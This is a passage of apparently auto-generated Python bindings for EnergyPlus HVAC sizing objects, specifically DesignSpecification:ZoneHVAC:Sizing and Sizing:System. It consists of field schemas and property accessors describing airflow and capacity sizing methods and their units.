           'format': None,
           'group': u'HVAC Design Objects',
           'min-fields': 1,
           'name': u'DesignSpecification:ZoneHVAC:Sizing',
           'pyname': u'DesignSpecificationZoneHvacSizing',
           'required-object': False,
           'unique-object': False}
@property
def name(self):
    """Get IDD field `Name`.

    Returns:
        str: the stored value, or None if not set.
    """
    field = "Name"
    return self[field]

@name.setter
def name(self, value=None):
    """Set IDD field `Name`."""
    self["Name"] = value
@property
def cooling_supply_air_flow_rate_method(self):
    """Get IDD field `Cooling Supply Air Flow Rate Method`.

    Selects how the cooling supply air volume flow rate is determined:
    None (no cooling coil / blank), SupplyAirFlowRate (explicit
    magnitude), FlowPerFloorArea (rate per served floor area),
    FractionOfAutosizedCoolingAirflow (fraction of the autosized cooling
    flow), or FlowPerCoolingCapacity (flow per simulated cooling
    capacity).  Default "SupplyAirFlowRate".

    Returns:
        str: the stored value, or None if not set.
    """
    field = "Cooling Supply Air Flow Rate Method"
    return self[field]

@cooling_supply_air_flow_rate_method.setter
def cooling_supply_air_flow_rate_method(self, value="SupplyAirFlowRate"):
    """Set IDD field `Cooling Supply Air Flow Rate Method`."""
    self["Cooling Supply Air Flow Rate Method"] = value
@property
def cooling_supply_air_flow_rate(self):
    """Get IDD field `Cooling Supply Air Flow Rate`.

    Supply air volume flow rate during cooling operation; required when
    Cooling Supply Air Flow Rate Method is SupplyAirFlowRate, may be
    blank without a cooling coil.  Units: m3/s.

    Returns:
        float or "Autosize": the stored value, or None if not set.
    """
    field = "Cooling Supply Air Flow Rate"
    return self[field]

@cooling_supply_air_flow_rate.setter
def cooling_supply_air_flow_rate(self, value=None):
    """Set IDD field `Cooling Supply Air Flow Rate` (m3/s)."""
    self["Cooling Supply Air Flow Rate"] = value
@property
def cooling_supply_air_flow_rate_per_floor_area(self):
    """Get IDD field `Cooling Supply Air Flow Rate Per Floor Area`.

    Cooling supply air flow per total conditioned floor area; required
    when the method is FlowPerFloorArea, may be blank without a cooling
    coil.  Units: m3/s-m2.

    Returns:
        float: the stored value, or None if not set.
    """
    field = "Cooling Supply Air Flow Rate Per Floor Area"
    return self[field]

@cooling_supply_air_flow_rate_per_floor_area.setter
def cooling_supply_air_flow_rate_per_floor_area(self, value=None):
    """Set IDD field `Cooling Supply Air Flow Rate Per Floor Area` (m3/s-m2)."""
    self["Cooling Supply Air Flow Rate Per Floor Area"] = value
@property
def cooling_fraction_of_autosized_cooling_supply_air_flow_rate(self):
    """Get IDD field `Cooling Fraction of Autosized Cooling Supply Air Flow Rate`.

    Supply air flow expressed as a fraction of the autosized cooling
    supply air flow rate; required when the method is
    FractionOfAutosizedCoolingAirflow, may be blank without a cooling
    coil.

    Returns:
        float: the stored value, or None if not set.
    """
    field = "Cooling Fraction of Autosized Cooling Supply Air Flow Rate"
    return self[field]

@cooling_fraction_of_autosized_cooling_supply_air_flow_rate.setter
def cooling_fraction_of_autosized_cooling_supply_air_flow_rate(self, value=None):
    """Set IDD field `Cooling Fraction of Autosized Cooling Supply Air Flow Rate`."""
    self["Cooling Fraction of Autosized Cooling Supply Air Flow Rate"] = value
@property
def cooling_supply_air_flow_rate_per_unit_cooling_capacity(self):
    """Get IDD field `Cooling Supply Air Flow Rate Per Unit Cooling Capacity`.

    Cooling supply air flow per unit of cooling capacity; required when
    the method is FlowPerCoolingCapacity, may be blank without a cooling
    coil.  Units: m3/s-W.

    Returns:
        float: the stored value, or None if not set.
    """
    field = "Cooling Supply Air Flow Rate Per Unit Cooling Capacity"
    return self[field]

@cooling_supply_air_flow_rate_per_unit_cooling_capacity.setter
def cooling_supply_air_flow_rate_per_unit_cooling_capacity(self, value=None):
    """Set IDD field `Cooling Supply Air Flow Rate Per Unit Cooling Capacity` (m3/s-W)."""
    self["Cooling Supply Air Flow Rate Per Unit Cooling Capacity"] = value
@property
def no_load_supply_air_flow_rate_method(self):
    """Get IDD field `No Load Supply Air Flow Rate Method`.

    Selects how the supply air flow rate is determined when neither
    cooling nor heating is required: None (no coil / blank),
    SupplyAirFlowRate, FlowPerFloorArea,
    FractionOfAutosizedCoolingAirflow, or
    FractionOfAutosizedHeatingAirflow.  Default "SupplyAirFlowRate".

    Returns:
        str: the stored value, or None if not set.
    """
    field = "No Load Supply Air Flow Rate Method"
    return self[field]

@no_load_supply_air_flow_rate_method.setter
def no_load_supply_air_flow_rate_method(self, value="SupplyAirFlowRate"):
    """Set IDD field `No Load Supply Air Flow Rate Method`."""
    self["No Load Supply Air Flow Rate Method"] = value
@property
def no_load_supply_air_flow_rate(self):
    """Get IDD field `No Load Supply Air Flow Rate`.

    Supply air flow when no cooling or heating is required; required
    when No Load Supply Air Flow Rate Method is SupplyAirFlowRate.
    Units: m3/s.

    Returns:
        float or "Autosize": the stored value, or None if not set.
    """
    field = "No Load Supply Air Flow Rate"
    return self[field]

@no_load_supply_air_flow_rate.setter
def no_load_supply_air_flow_rate(self, value=None):
    """Set IDD field `No Load Supply Air Flow Rate` (m3/s)."""
    self["No Load Supply Air Flow Rate"] = value
@property
def no_load_supply_air_flow_rate_per_floor_area(self):
    """Get IDD field `No Load Supply Air Flow Rate Per Floor Area`.

    Supply air flow per total floor area; required when No Load Supply
    Air Flow Rate Method is FlowPerFloorArea.  Units: m3/s-m2.

    Returns:
        float: the stored value, or None if not set.
    """
    field = "No Load Supply Air Flow Rate Per Floor Area"
    return self[field]

@no_load_supply_air_flow_rate_per_floor_area.setter
def no_load_supply_air_flow_rate_per_floor_area(self, value=None):
    """Set IDD field `No Load Supply Air Flow Rate Per Floor Area` (m3/s-m2)."""
    self["No Load Supply Air Flow Rate Per Floor Area"] = value
@property
def no_load_fraction_of_cooling_supply_air_flow_rate(self):
    """Get IDD field `No Load Fraction of Cooling Supply Air Flow Rate`.

    Supply air flow as a fraction of the cooling supply air flow rate;
    required when No Load Supply Air Flow Rate Method is
    FractionOfAutosizedCoolingAirflow.

    Returns:
        float: the stored value, or None if not set.
    """
    field = "No Load Fraction of Cooling Supply Air Flow Rate"
    return self[field]

@no_load_fraction_of_cooling_supply_air_flow_rate.setter
def no_load_fraction_of_cooling_supply_air_flow_rate(self, value=None):
    """Set IDD field `No Load Fraction of Cooling Supply Air Flow Rate`."""
    self["No Load Fraction of Cooling Supply Air Flow Rate"] = value
@property
def no_load_fraction_of_heating_supply_air_flow_rate(self):
    """Get IDD field `No Load Fraction of Heating Supply Air Flow Rate`.

    Supply air flow as a fraction of the heating supply air flow rate;
    required when No Load Supply Air Flow Rate Method is
    FractionOfAutosizedHeatingAirflow.

    Returns:
        float: the stored value, or None if not set.
    """
    field = "No Load Fraction of Heating Supply Air Flow Rate"
    return self[field]

@no_load_fraction_of_heating_supply_air_flow_rate.setter
def no_load_fraction_of_heating_supply_air_flow_rate(self, value=None):
    """Set IDD field `No Load Fraction of Heating Supply Air Flow Rate`."""
    self["No Load Fraction of Heating Supply Air Flow Rate"] = value
@property
def heating_supply_air_flow_rate_method(self):
    """Get IDD field `Heating Supply Air Flow Rate Method`.

    Selects how the heating supply air volume flow rate is determined:
    None (no heating coil / blank), SupplyAirFlowRate (explicit
    magnitude), FlowPerFloorArea (rate per served floor area),
    FractionOfAutosizedHeatingAirflow (fraction of the autosized heating
    flow), or FlowPerHeatingCapacity (flow per simulated heating
    capacity).  Default "SupplyAirFlowRate".

    Returns:
        str: the stored value, or None if not set.
    """
    field = "Heating Supply Air Flow Rate Method"
    return self[field]

@heating_supply_air_flow_rate_method.setter
def heating_supply_air_flow_rate_method(self, value="SupplyAirFlowRate"):
    """Set IDD field `Heating Supply Air Flow Rate Method`."""
    self["Heating Supply Air Flow Rate Method"] = value
@property
def heating_supply_air_flow_rate(self):
    """Get IDD field `Heating Supply Air Flow Rate`.

    Supply air volume flow rate during heating operation; required when
    Heating Supply Air Flow Rate Method is SupplyAirFlowRate, may be
    blank without a heating coil.  Units: m3/s.

    Returns:
        float or "Autosize": the stored value, or None if not set.
    """
    field = "Heating Supply Air Flow Rate"
    return self[field]

@heating_supply_air_flow_rate.setter
def heating_supply_air_flow_rate(self, value=None):
    """Set IDD field `Heating Supply Air Flow Rate` (m3/s)."""
    self["Heating Supply Air Flow Rate"] = value
@property
def heating_supply_air_flow_rate_per_floor_area(self):
    """Get IDD field `Heating Supply Air Flow Rate Per Floor Area`.

    Heating supply air flow per total conditioned floor area; required
    when the method is FlowPerFloorArea, may be blank without a heating
    coil.  Units: m3/s-m2.

    Returns:
        float: the stored value, or None if not set.
    """
    field = "Heating Supply Air Flow Rate Per Floor Area"
    return self[field]

@heating_supply_air_flow_rate_per_floor_area.setter
def heating_supply_air_flow_rate_per_floor_area(self, value=None):
    """Set IDD field `Heating Supply Air Flow Rate Per Floor Area` (m3/s-m2)."""
    self["Heating Supply Air Flow Rate Per Floor Area"] = value
@property
def heating_fraction_of_heating_supply_air_flow_rate(self):
    """Get IDD field `Heating Fraction of Heating Supply Air Flow Rate`.

    Supply air flow as a fraction of the heating supply air flow rate;
    required when the method is FractionOfAutosizedHeatingAirflow, may
    be blank without a heating coil.

    Returns:
        float: the stored value, or None if not set.
    """
    field = "Heating Fraction of Heating Supply Air Flow Rate"
    return self[field]

@heating_fraction_of_heating_supply_air_flow_rate.setter
def heating_fraction_of_heating_supply_air_flow_rate(self, value=None):
    """Set IDD field `Heating Fraction of Heating Supply Air Flow Rate`."""
    self["Heating Fraction of Heating Supply Air Flow Rate"] = value
@property
def heating_supply_air_flow_rate_per_unit_heating_capacity(self):
    """Get IDD field `Heating Supply Air Flow Rate Per Unit Heating Capacity`.

    Supply air flow per unit of heating capacity; required when the
    method is FlowPerHeatingCapacity, may be blank without a heating
    coil.  Units: m3/s-W.

    Returns:
        float: the stored value, or None if not set.
    """
    field = "Heating Supply Air Flow Rate Per Unit Heating Capacity"
    return self[field]

@heating_supply_air_flow_rate_per_unit_heating_capacity.setter
def heating_supply_air_flow_rate_per_unit_heating_capacity(self, value=None):
    """Set IDD field `Heating Supply Air Flow Rate Per Unit Heating Capacity` (m3/s-W)."""
    self["Heating Supply Air Flow Rate Per Unit Heating Capacity"] = value
@property
def cooling_design_capacity_method(self):
    """Get IDD field `Cooling Design Capacity Method`.

    Selects how the cooling design capacity is determined for scalable
    sizing: None / blank (capacity set to zero), CoolingDesignCapacity
    (explicit or auto-sized), CapacityPerFloorArea (capacity per floor
    area times zone floor area), or FractionOfAutosizedCoolingCapacity
    (fraction of the auto-sized capacity).  Default "None".

    Returns:
        str: the stored value, or None if not set.
    """
    field = "Cooling Design Capacity Method"
    return self[field]

@cooling_design_capacity_method.setter
def cooling_design_capacity_method(self, value="None"):
    """Set IDD field `Cooling Design Capacity Method`."""
    self["Cooling Design Capacity Method"] = value
@property
def cooling_design_capacity(self):
    """Get IDD field `Cooling Design Capacity`.

    Design cooling capacity; required when the cooling design capacity
    method is CoolingDesignCapacity.  Units: W.

    Returns:
        float or "Autosize": the stored value, or None if not set.
    """
    field = "Cooling Design Capacity"
    return self[field]

@cooling_design_capacity.setter
def cooling_design_capacity(self, value=None):
    """Set IDD field `Cooling Design Capacity` (W)."""
    self["Cooling Design Capacity"] = value
@property
def cooling_design_capacity_per_floor_area(self):
    """Get IDD field `Cooling Design Capacity Per Floor Area`.

    Cooling design capacity per zone floor area; required when the
    cooling design capacity method is CapacityPerFloorArea.
    Units: W/m2.

    Returns:
        float: the stored value, or None if not set.
    """
    field = "Cooling Design Capacity Per Floor Area"
    return self[field]

@cooling_design_capacity_per_floor_area.setter
def cooling_design_capacity_per_floor_area(self, value=None):
    """Set IDD field `Cooling Design Capacity Per Floor Area` (W/m2)."""
    self["Cooling Design Capacity Per Floor Area"] = value
@property
def fraction_of_autosized_cooling_design_capacity(self):
"""field `Fraction of Autosized Cooling Design Capacity`
| Enter the fraction of auto-sized cooling design capacity. Required field when the cooling
| design capacity method field is FractionOfAutosizedCoolingCapacity.
Args:
value (float): value for IDD Field `Fraction of Autosized Cooling Design Capacity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `fraction_of_autosized_cooling_design_capacity` or None if not set
"""
return self["Fraction of Autosized Cooling Design Capacity"]
@fraction_of_autosized_cooling_design_capacity.setter
def fraction_of_autosized_cooling_design_capacity(self, value=None):
"""Corresponds to IDD field `Fraction of Autosized Cooling Design
Capacity`"""
self["Fraction of Autosized Cooling Design Capacity"] = value
@property
def heating_design_capacity_method(self):
"""field `Heating Design Capacity Method`
| Enter the method used to determine the heating design capacity for scalable sizing.
| None is used when a heating coil is not included in the Zone HVAC Equipment or
| this field may be blank. If this input field is left blank, then the design heating
| capacity is set to zero. HeatingDesignCapacity => selected when the design heating capacity
| value is specified or auto-sized. CapacityPerFloorArea => selected when the design cooling
| capacity is determine from user specified heating capacity per flow area and zone floor area.
| FractionOfAutosizedHeatingCapacity => is selected when the design heating capacity is
| determined from a user specified fraction and the auto-sized design heating capacity
| Default value: None
Args:
value (str): value for IDD Field `Heating Design Capacity Method`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `heating_design_capacity_method` or None if not set
"""
return self["Heating Design Capacity Method"]
@heating_design_capacity_method.setter
def heating_design_capacity_method(self, value="None"):
"""Corresponds to IDD field `Heating Design Capacity Method`"""
self["Heating Design Capacity Method"] = value
@property
def heating_design_capacity(self):
"""field `Heating Design Capacity`
| Enter the design heating capacity. Required field when the heating design capacity method
| HeatingDesignCapacity.
| Units: W
Args:
value (float or "Autosize"): value for IDD Field `Heating Design Capacity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `heating_design_capacity` or None if not set
"""
return self["Heating Design Capacity"]
@heating_design_capacity.setter
def heating_design_capacity(self, value=None):
"""Corresponds to IDD field `Heating Design Capacity`"""
self["Heating Design Capacity"] = value
@property
def heating_design_capacity_per_floor_area(self):
"""field `Heating Design Capacity Per Floor Area`
| Enter the heating design capacity per zone floor area. Required field when the heating design
| capacity method field is CapacityPerFloorArea.
| Units: W/m2
Args:
value (float): value for IDD Field `Heating Design Capacity Per Floor Area`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `heating_design_capacity_per_floor_area` or None if not set
"""
return self["Heating Design Capacity Per Floor Area"]
@heating_design_capacity_per_floor_area.setter
def heating_design_capacity_per_floor_area(self, value=None):
"""Corresponds to IDD field `Heating Design Capacity Per Floor Area`"""
self["Heating Design Capacity Per Floor Area"] = value
@property
def fraction_of_autosized_heating_design_capacity(self):
"""field `Fraction of Autosized Heating Design Capacity`
| Enter the fraction of auto-sized heating design capacity. Required field when capacity the
| heating design capacity method field is FractionOfAutosizedHeatingCapacity.
Args:
value (float): value for IDD Field `Fraction of Autosized Heating Design Capacity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `fraction_of_autosized_heating_design_capacity` or None if not set
"""
return self["Fraction of Autosized Heating Design Capacity"]
@fraction_of_autosized_heating_design_capacity.setter
def fraction_of_autosized_heating_design_capacity(self, value=None):
"""Corresponds to IDD field `Fraction of Autosized Heating Design
Capacity`"""
self["Fraction of Autosized Heating Design Capacity"] = value
class SizingSystem(DataObject):

    """ Corresponds to IDD object `Sizing:System`
        Specifies the input needed to perform sizing calculations for a central forced air
        system. System design air flow, heating capacity, and cooling capacity will be calculated
        using this input data. Field values are read and written through the
        dict-style access provided by DataObject, keyed by IDD field name.
    """
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'airloop name',
{'name': u'AirLoop Name',
'pyname': u'airloop_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'type of load to size on',
{'name': u'Type of Load to Size On',
'pyname': u'type_of_load_to_size_on',
'default': u'Sensible',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Sensible',
u'Total',
u'VentilationRequirement'],
'autocalculatable': False,
'type': 'alpha'}),
(u'design outdoor air flow rate',
{'name': u'Design Outdoor Air Flow Rate',
'pyname': u'design_outdoor_air_flow_rate',
'default': 'autosize',
'required-field': False,
'autosizable': True,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'central heating maximum system air flow ratio',
{'name': u'Central Heating Maximum System Air Flow Ratio',
'pyname': u'central_heating_maximum_system_air_flow_ratio',
'default': 0.5,
'maximum': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'preheat design temperature',
{'name': u'Preheat Design Temperature',
'pyname': u'preheat_design_temperature',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'preheat design humidity ratio',
{'name': u'Preheat Design Humidity Ratio',
'pyname': u'preheat_design_humidity_ratio',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'kgWater/kgDryAir'}),
(u'precool design temperature',
{'name': u'Precool Design Temperature',
'pyname': u'precool_design_temperature',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'precool design humidity ratio',
{'name': u'Precool Design Humidity Ratio',
'pyname': u'precool_design_humidity_ratio',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'kgWater/kgDryAir'}),
(u'central cooling design supply air temperature',
{'name': u'Central Cooling Design Supply Air Temperature',
'pyname': u'central_cooling_design_supply_air_temperature',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'central heating design supply air temperature',
{'name': u'Central Heating Design Supply Air Temperature',
'pyname': u'central_heating_design_supply_air_temperature',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'type of zone sum to use',
{'name': u'Type of Zone Sum to Use',
'pyname': u'type_of_zone_sum_to_use',
'default': u'NonCoincident',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Coincident',
u'NonCoincident'],
'autocalculatable': False,
'type': 'alpha'}),
(u'100% outdoor air in cooling',
{'name': u'100% Outdoor Air in Cooling',
'pyname': u'a_100_outdoor_air_in_cooling',
'default': u'No',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Yes',
u'No'],
'autocalculatable': False,
'type': 'alpha'}),
(u'100% outdoor air in heating',
{'name': u'100% Outdoor Air in Heating',
'pyname': u'a_100_outdoor_air_in_heating',
'default': u'No',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Yes',
u'No'],
'autocalculatable': False,
'type': 'alpha'}),
(u'central cooling design supply air humidity ratio',
{'name': u'Central Cooling Design Supply Air Humidity Ratio',
'pyname': u'central_cooling_design_supply_air_humidity_ratio',
'default': 0.008,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'kgWater/kgDryAir'}),
(u'central heating design supply air humidity ratio',
{'name': u'Central Heating Design Supply Air Humidity Ratio',
'pyname': u'central_heating_design_supply_air_humidity_ratio',
'default': 0.008,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'kgWater/kgDryAir'}),
(u'cooling supply air flow rate method',
{'name': u'Cooling Supply Air Flow Rate Method',
'pyname': u'cooling_supply_air_flow_rate_method',
'default': u'DesignDay',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Flow/System',
u'DesignDay',
u'FlowPerFloorArea',
u'FractionOfAutosizedCoolingAirflow',
u'FlowPerCoolingCapacity'],
'autocalculatable': False,
'type': 'alpha'}),
(u'cooling supply air flow rate',
{'name': u'Cooling Supply Air Flow Rate',
'pyname': u'cooling_supply_air_flow_rate',
'default': 0.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'cooling supply air flow rate per floor area',
{'name': u'Cooling Supply Air Flow Rate Per Floor Area',
'pyname': u'cooling_supply_air_flow_rate_per_floor_area',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s-m2'}),
(u'cooling fraction of autosized cooling supply air flow rate',
{'name': u'Cooling Fraction of Autosized Cooling Supply Air Flow Rate',
'pyname': u'cooling_fraction_of_autosized_cooling_supply_air_flow_rate',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'cooling supply air flow rate per unit cooling capacity',
{'name': u'Cooling Supply Air Flow Rate Per Unit Cooling Capacity',
'pyname': u'cooling_supply_air_flow_rate_per_unit_cooling_capacity',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s-W'}),
(u'heating supply air flow rate method',
{'name': u'Heating Supply Air Flow Rate Method',
'pyname': u'heating_supply_air_flow_rate_method',
'default': u'DesignDay',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Flow/System',
u'DesignDay',
u'FlowPerFloorArea',
u'FractionOfAutosizedHeatingAirflow',
u'FractionOfAutosizedCoolingAirflow',
u'FlowPerCoolingCapacity'],
'autocalculatable': False,
'type': 'alpha'}),
(u'heating supply air flow rate',
{'name': u'Heating Supply Air Flow Rate',
'pyname': u'heating_supply_air_flow_rate',
'default': 0.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'heating supply air flow rate per floor area',
{'name': u'Heating Supply Air Flow Rate Per Floor Area',
'pyname': u'heating_supply_air_flow_rate_per_floor_area',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s-m2'}),
(u'heating fraction of autosized heating supply air flow rate',
{'name': u'Heating Fraction of Autosized Heating Supply Air Flow Rate',
'pyname': u'heating_fraction_of_autosized_heating_supply_air_flow_rate',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'heating fraction of autosized cooling supply air flow rate',
{'name': u'Heating Fraction of Autosized Cooling Supply Air Flow Rate',
'pyname': u'heating_fraction_of_autosized_cooling_supply_air_flow_rate',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'heating supply air flow rate per unit heating capacity',
{'name': u'Heating Supply Air Flow Rate Per Unit Heating Capacity',
'pyname': u'heating_supply_air_flow_rate_per_unit_heating_capacity',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s-W'}),
(u'system outdoor air method',
{'name': u'System Outdoor Air Method',
'pyname': u'system_outdoor_air_method',
'default': u'ZoneSum',
'required-field': False,
'autosizable': False,
'accepted-values': [u'ZoneSum',
u'VentilationRateProcedure'],
'autocalculatable': False,
'type': 'alpha'}),
(u'zone maximum outdoor air fraction',
{'name': u'Zone Maximum Outdoor Air Fraction',
'pyname': u'zone_maximum_outdoor_air_fraction',
'default': 1.0,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'cooling design capacity method',
{'name': u'Cooling Design Capacity Method',
'pyname': u'cooling_design_capacity_method',
'default': u'CoolingDesignCapacity',
'required-field': False,
'autosizable': False,
'accepted-values': [u'None',
u'CoolingDesignCapacity',
u'CapacityPerFloorArea',
u'FractionOfAutosizedCoolingCapacity'],
'autocalculatable': False,
'type': 'alpha'}),
(u'cooling design capacity',
{'name': u'Cooling Design Capacity',
'pyname': u'cooling_design_capacity',
'default': 'autosize',
'required-field': False,
'autosizable': True,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'W'}),
(u'cooling design capacity per floor area',
{'name': u'Cooling Design Capacity Per Floor Area',
'pyname': u'cooling_design_capacity_per_floor_area',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'W/m2'}),
(u'fraction of autosized cooling design capacity',
{'name': u'Fraction of Autosized Cooling Design Capacity',
'pyname': u'fraction_of_autosized_cooling_design_capacity',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'heating design capacity method',
{'name': u'Heating Design Capacity Method',
'pyname': u'heating_design_capacity_method',
'default': u'HeatingDesignCapacity',
'required-field': False,
'autosizable': False,
'accepted-values': [u'None',
u'HeatingDesignCapacity',
u'CapacityPerFloorArea',
u'FractionOfAutosizedHeatingCapacity'],
'autocalculatable': False,
'type': 'alpha'}),
(u'heating design capacity',
{'name': u'Heating Design Capacity',
'pyname': u'heating_design_capacity',
'default': 'autosize',
'required-field': False,
'autosizable': True,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'W'}),
(u'heating design capacity per floor area',
{'name': u'Heating Design Capacity Per Floor Area',
'pyname': u'heating_design_capacity_per_floor_area',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'W/m2'}),
(u'fraction of autosized heating design capacity',
{'name': u'Fraction of Autosized Heating Design Capacity',
'pyname': u'fraction_of_autosized_heating_design_capacity',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'central cooling capacity control method',
{'name': u'Central Cooling Capacity Control Method',
'pyname': u'central_cooling_capacity_control_method',
'default': u'OnOff',
'required-field': False,
'autosizable': False,
'accepted-values': [u'VAV',
u'Bypass',
u'VT',
u'OnOff'],
'autocalculatable': False,
'type': 'alpha'})]),
'format': None,
'group': u'HVAC Design Objects',
'min-fields': 37,
'name': u'Sizing:System',
'pyname': u'SizingSystem',
'required-object': False,
'unique-object': False}
@property
def airloop_name(self):
"""field `AirLoop Name`
Args:
value (str): value for IDD Field `AirLoop Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `airloop_name` or None if not set
"""
return self["AirLoop Name"]
@airloop_name.setter
def airloop_name(self, value=None):
"""Corresponds to IDD field `AirLoop Name`"""
self["AirLoop Name"] = value
@property
def type_of_load_to_size_on(self):
"""field `Type of Load to Size On`
| Specifies the basis for sizing the system supply air flow rate
| Sensible and VentilationRequirement are the only available options
| Sensible uses the zone design air flow rates
| VentilationRequirement uses the system ventilation requirement
| Default value: Sensible
Args:
value (str): value for IDD Field `Type of Load to Size On`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `type_of_load_to_size_on` or None if not set
"""
return self["Type of Load to Size On"]
@type_of_load_to_size_on.setter
def type_of_load_to_size_on(self, value="Sensible"):
"""Corresponds to IDD field `Type of Load to Size On`"""
self["Type of Load to Size On"] = value
@property
def design_outdoor_air_flow_rate(self):
"""field `Design Outdoor Air Flow Rate`
| Units: m3/s
| Default value: "autosize"
Args:
value (float or "Autosize"): value for IDD Field `Design Outdoor Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `design_outdoor_air_flow_rate` or None if not set
"""
return self["Design Outdoor Air Flow Rate"]
@design_outdoor_air_flow_rate.setter
def design_outdoor_air_flow_rate(self, value="autosize"):
"""Corresponds to IDD field `Design Outdoor Air Flow Rate`"""
self["Design Outdoor Air Flow Rate"] = value
@property
def central_heating_maximum_system_air_flow_ratio(self):
"""field `Central Heating Maximum System Air Flow Ratio`
| Default value: 0.5
| value <= 1.0
Args:
value (float): value for IDD Field `Central Heating Maximum System Air Flow Ratio`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `central_heating_maximum_system_air_flow_ratio` or None if not set
"""
return self["Central Heating Maximum System Air Flow Ratio"]
@central_heating_maximum_system_air_flow_ratio.setter
def central_heating_maximum_system_air_flow_ratio(self, value=0.5):
"""Corresponds to IDD field `Central Heating Maximum System Air Flow
Ratio`"""
self["Central Heating Maximum System Air Flow Ratio"] = value
@property
def preheat_design_temperature(self):
"""field `Preheat Design Temperature`
| Units: C
Args:
value (float): value for IDD Field `Preheat Design Temperature`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `preheat_design_temperature` or None if not set
"""
return self["Preheat Design Temperature"]
@preheat_design_temperature.setter
def preheat_design_temperature(self, value=None):
"""Corresponds to IDD field `Preheat Design Temperature`"""
self["Preheat Design Temperature"] = value
@property
def preheat_design_humidity_ratio(self):
"""field `Preheat Design Humidity Ratio`
| Units: kgWater/kgDryAir
Args:
value (float): value for IDD Field `Preheat Design Humidity Ratio`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `preheat_design_humidity_ratio` or None if not set
"""
return self["Preheat Design Humidity Ratio"]
@preheat_design_humidity_ratio.setter
def preheat_design_humidity_ratio(self, value=None):
"""Corresponds to IDD field `Preheat Design Humidity Ratio`"""
self["Preheat Design Humidity Ratio"] = value
@property
def precool_design_temperature(self):
"""field `Precool Design Temperature`
| Units: C
Args:
value (float): value for IDD Field `Precool Design Temperature`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `precool_design_temperature` or None if not set
"""
return self["Precool Design Temperature"]
@precool_design_temperature.setter
def precool_design_temperature(self, value=None):
"""Corresponds to IDD field `Precool Design Temperature`"""
self["Precool Design Temperature"] = value
@property
def precool_design_humidity_ratio(self):
"""field `Precool Design Humidity Ratio`
| Units: kgWater/kgDryAir
Args:
value (float): value for IDD Field `Precool Design Humidity Ratio`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `precool_design_humidity_ratio` or None if not set
"""
return self["Precool Design Humidity Ratio"]
@precool_design_humidity_ratio.setter
def precool_design_humidity_ratio(self, value=None):
"""Corresponds to IDD field `Precool Design Humidity Ratio`"""
self["Precool Design Humidity Ratio"] = value
@property
def central_cooling_design_supply_air_temperature(self):
"""field `Central Cooling Design Supply Air Temperature`
| Units: C
Args:
value (float): value for IDD Field `Central Cooling Design Supply Air Temperature`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `central_cooling_design_supply_air_temperature` or None if not set
"""
return self["Central Cooling Design Supply Air Temperature"]
@central_cooling_design_supply_air_temperature.setter
